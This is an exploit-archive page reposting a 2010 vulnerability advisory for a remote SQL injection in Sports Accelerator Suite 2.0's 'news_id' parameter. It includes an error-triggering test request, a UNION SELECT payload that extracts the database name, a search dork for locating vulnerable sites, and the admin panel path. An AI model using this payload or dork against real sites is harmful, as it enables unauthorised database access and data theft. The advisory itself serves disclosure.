exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Sports Accelerator Suite 2.0 SQL Injection

Sports Accelerator Suite 2.0 SQL Injection
Posted Aug 17, 2010
Authored by LiquidWorm | Site zeroscience.mk

Sport Accelerator Suite version 2.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 6eba3de6d752edf0327713ad11ab93fe42fc85582a378a4f2dd4b9a60a4ee954

Sports Accelerator Suite 2.0 SQL Injection

Change Mirror Download


Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability



Vendor: Athlete Web Services, Inc. / AWS Sports
Product Web Page: http://www.athletewebservices.com


Summary: Content Management System (PHP+MySQL).


Description: The CMS is vulnerable to an SQL Injection attack when input is
passed to the "news_id" parameter. The script fails to properly sanitize the
input before being returned to the user allowing the attacker to compromise
the entire DB system and view sensitive information.


=============================================================================

GET .../show_news.php?news_id=xx%27

1064 - You have an error in your SQL syntax. Check the manual that corresponds
to your MySQL server version for the right syntax to use near '\'' at line xx.

=============================================================================


Affected Version: 1.1 and 2.0


Tested On: Microsoft IIS 6.0
MySQL 4.0.15-log
PHP 4.3.3


Vulnerability Discovered By: Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
http://www.zeroscience.mk


Vendor Status: [05.06.2010] Vulnerability discovered.
[09.08.2010] Vendor contacted.
[13.08.2010] No response from vendor.
[14.08.2010] Public advisory released.


Zero Science Lab Advisory ID: ZSL-2010-4949
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4949.php


Vector:

-----------------------------------------------------------------------------

Dork: "Designed and powered by AWS Sports"

Query: http://vulnpage.tld/show_news.php?news_id=xx+and+1=0+%20union%20select%20database%28%29,2,3,4,5,6,7..[n]

Admin: http://vulpage.tld/admin/index.php

-----------------------------------------------------------------------------



t00t!
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close